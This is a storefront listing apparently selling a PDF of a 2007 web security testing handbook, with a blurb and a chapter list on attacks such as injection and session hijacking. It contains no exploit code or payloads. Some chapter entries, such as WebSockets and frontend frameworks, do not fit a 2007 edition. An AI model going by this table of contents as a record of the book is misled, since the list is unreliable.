The Web Application Hacker Handbook Oct 2007 1st Edition by Dafydd Stuttard, Marcus Pinto ISBN 9780470170779
Original price was: $50.00.$35.00Current price is: $35.00.
Authors:Stuttard, Dafydd; Pinto, Marcus , Series:IT & Computer [249] , Tags:Computer Communication Networks; Information Technology , Author sort:Stuttard, Dafydd; Pinto, Marcus , Languages:Languages:eng , Published:Published:Dec 2007 , Publisher:Wiley , Comments:This book is a practical guide to discovering and exploiting security flaws in web applications. The authors explain each category of vulnerability using real-world examples, screen shots and code extracts. The book is extremely practical in focus, and describes in detail the steps involved in detecting and exploiting each kind of security weakness found within a variety of applications such as online banking, e-commerce and other web applications. The topics covered include bypassing login mechanisms, injecting code, exploiting logic flaws and compromising other users. Because every web application is different, attacking them entails bringing to bear various general principles, techniques and experience in an imaginative way. The most successful hackers go beyond this, and find ways to automate their bespoke attacks. This handbook describes a proven methodology that combines the virtues of human intelligence and computerized brute force, often with devastating results. The authors are professional penetration testers who have been involved in web application security for nearly a decade. They have presented training courses at the Black Hat security conferences throughout the world. Under the alias “PortSwigger”, Dafydd developed the popular Burp Suite of web application hack tools.
The Web Application Hacker Handbook Oct 2007 1st Edition by Dafydd Stuttard, Marcus Pinto – Ebook PDF Instant Download/Delivery. 9780470170779
Full download The Web Application Hacker Handbook Oct 2007 1st Edition after payment
Product details:
ISBN 10:
ISBN 13: 9780470170779
Author: Dafydd Stuttard, Marcus Pinto
This book is a practical guide to discovering and exploiting security flaws in web applications. The authors explain each category of vulnerability using real-world examples, screen shots and code extracts. The book is extremely practical in focus, and describes in detail the steps involved in detecting and exploiting each kind of security weakness found within a variety of applications such as online banking, e-commerce and other web applications.
The topics covered include bypassing login mechanisms, injecting code, exploiting logic flaws and compromising other users. Because every web application is different, attacking them entails bringing to bear various general principles, techniques and experience in an imaginative way. The most successful hackers go beyond this, and find ways to automate their bespoke attacks. This handbook describes a proven methodology that combines the virtues of human intelligence and computerized brute force, often with devastating results.
The authors are professional penetration testers who have been involved in web application security for nearly a decade. They have presented training courses at the Black Hat security conferences throughout the world. Under the alias “PortSwigger”, Dafydd developed the popular Burp Suite of web application hack tools.
The Web Application Hacker Handbook Oct 2007 1st Edition Table of contents:
1. Web Application (In)security
- Understanding Web Application Attacks
- The Threat Landscape
- Why Applications Are Vulnerable
2. Core Defense Mechanisms
- HTTP Protocol Essentials
- HTTPS and Secure Communication
- Web Application Architecture
3. Web Application Technologies
- Understanding Backend Technologies
- Frontend Frameworks and JavaScript
4. Mapping the Application
- Understanding Application Logic
- Identifying Key Functionalities
- Information Gathering Techniques
5. Bypassing Client-Side Controls
- Hidden Fields and Cookies
- URL Manipulation and Tampering
- Circumventing Validation Mechanisms
6. Attacking Authentication
- Weak Passwords and Account Enumeration
- Exploiting Session Tokens
- Authentication Logic Flaws
7. Attacking Session Management
- Session Fixation
- Predictable Session Tokens
- Hijacking User Sessions
8. Attacking Access Controls
- Horizontal and Vertical Privilege Escalation
- Forced Browsing
- Exploiting Misconfigured Permissions
9. Data Validation and Injection
- SQL Injection
- Command Injection
- LDAP and XPath Injection
10. Exploiting Other Input Flaws
- Cross-Site Scripting (XSS)
- HTTP Header Injection
- Remote File Inclusion (RFI) and Local File Inclusion (LFI)
11. Attacking Application Logic
- Logic-Based Vulnerabilities
- Exploiting Business Logic Flaws
12. Attacking Users: Cross-Site Attacks
- Cross-Site Request Forgery (CSRF)
- Clickjacking and UI Redressing
- Session Riding
13. Automating Customized Attacks
- Tools for Web Application Testing
- Writing Custom Scripts and Exploits
14. Exploiting Information Disclosure
- Error Messages and Debugging Data
- Sensitive Files and Directories
- Leveraging Metadata
15. Attacking Rich Client Technologies
- Flash and Silverlight Vulnerabilities
- AJAX Security Concerns
- WebSockets and Real-Time Communication
16. Attacking the Application Server
- Exploiting Server Configuration Issues
- File Upload Vulnerabilities
- Remote Code Execution
17. Finding Vulnerabilities in Source Code
- Reviewing Code for Security Flaws
- Static and Dynamic Code Analysis
18. A Web Application Hacker’s Toolkit
- Burp Suite and Other Tools
- Browser Extensions for Testing
- Setting Up a Testing Environment
19. Writing Reports and Recommendations
- Documenting Findings
- Communicating Risk to Stakeholders
- Providing Remediation Guidance
Appendix: Checklist for Securing Web Applications
- Common Attack Vectors
- Security Best Practices
People also search for The Web Application Hacker Handbook Oct 2007 1st Edition:
the web application hacker’s handbook reddit
the web application hacker’s handbook
the web application hacker’s handbook second edition
the web application hacker’s handbook 2
You may also like…
eBook PDF
Handbook of Metacognition in Education 1st Edition by Douglas Hacker 9781135591939 1135591938
